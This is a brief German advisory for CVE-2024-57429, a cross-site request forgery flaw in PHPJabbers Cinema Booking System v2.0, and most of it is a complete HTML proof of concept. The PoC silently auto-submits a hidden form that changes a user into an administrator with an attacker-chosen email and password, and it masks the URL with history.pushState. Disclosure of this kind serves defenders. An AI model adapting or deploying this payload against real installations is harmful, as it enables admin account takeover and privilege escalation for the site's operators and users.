
CVE-2024-57429: PHPJabbers Cinema Booking System v2.0 ist anfällig für CSRF, sodass Angreifer durch gefälschte Anfragen im Namen eines Administrators Privilegien eskalieren können.
Eine Cross-Site-Request-Forgery (CSRF) Schwachstelle in der pjActionUpdate-Funktion des PHPJabbers Cinema Booking Systems v2.0 ermöglicht es entfernten Angreifern, ihre Berechtigungen zu eskalieren, indem sie einen authentifizierten Admin dazu verleiten, eine unbefugte Anfrage zu senden.
Die Ausnutzung dieser CSRF-Schwachstelle kann zu unbefugten Aktionen führen, wie z. B.:
<html>
<!-- CSRF PoC - Update Admin User -->
<body>
<form action="http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionUpdate" method="POST">
<input type="hidden" name="user_update" value="1" />
<input type="hidden" name="id" value="3" />
<input type="hidden" name="role_id" value="1" />
<input type="hidden" name="email" value="[email protected]" />
<input type="hidden" name="password" value="newpassword123" />
<input type="hidden" name="name" value="Attacker" />
<input type="hidden" name="phone" value="1234567890" />
<input type="hidden" name="status" value="T" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>